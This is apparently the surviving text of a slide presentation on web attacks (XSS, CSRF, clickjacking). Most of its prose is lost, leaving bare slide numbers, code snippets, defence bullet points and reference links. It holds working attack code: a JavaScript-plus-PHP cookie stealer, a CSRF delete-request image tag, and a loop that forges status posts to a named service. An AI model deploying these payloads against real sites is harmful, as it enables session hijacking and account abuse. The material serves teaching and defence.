2. 2

3. 3

4. 4

5. •
–
–
–
•
•

9. Cross-site scripting XSS

10. XSS

11. • Cookie
• DOM
•
•…

12. Yupoo XSS

14. alert

15. Javascript
var img = new Image();
img.src = 'get_cookie.php?var='+encodeURI(document.cookie);
PHP
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt',
urldecode($_GET['var']));
}

16. “ ”

19. • Filter input,Escape output
• Cookie
• noscript?

22. •
•

23. • http://en.wikipedia.org/wiki/Cross-site_scripting
• http://www.gracecode.com/archives/2517
• http://www.gracecode.com/archives/2491
• http://ha.ckers.org/xss.html
• http://www.xssed.com/

25. CSRF Cross Site Request Forgery

27. <img src=“http://.../del.php?id=64” />

32. <form action="http://jiwai.de/wo/status/update"
method="post">
<textarea name="jw_status"></textarea>
<input type="submit" />
</form>

33. •
• GET POST
•

34. setInterval(function() {
var img = new Image();
var message = ' ';
var api = 'http://jiwai.de/wo/status/
update';
img.src = api + '?jw_status=' + message +
'&t=' + +new Date();
}, 1000);

35. “ ”

41. • GET POST Cookie
• Referer
• Token
•

42. • _tb_token_
• Referer

43. • http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.cgisecurity.com/csrf-faq.html
• http://www.80sec.com/csrf-securit.html
• http://www.playhack.net/view.php?id=31

46. Twitter Clickjacking

47. 1. iframe Twitter
0
2. “ ”
3.
Twitter

49. •
•

53. CSRF

55. Cookie Session

56. • “JS ”
•
•

58. Q&A

60. 'alert(/tHx/)'.replace(/.+/, eval);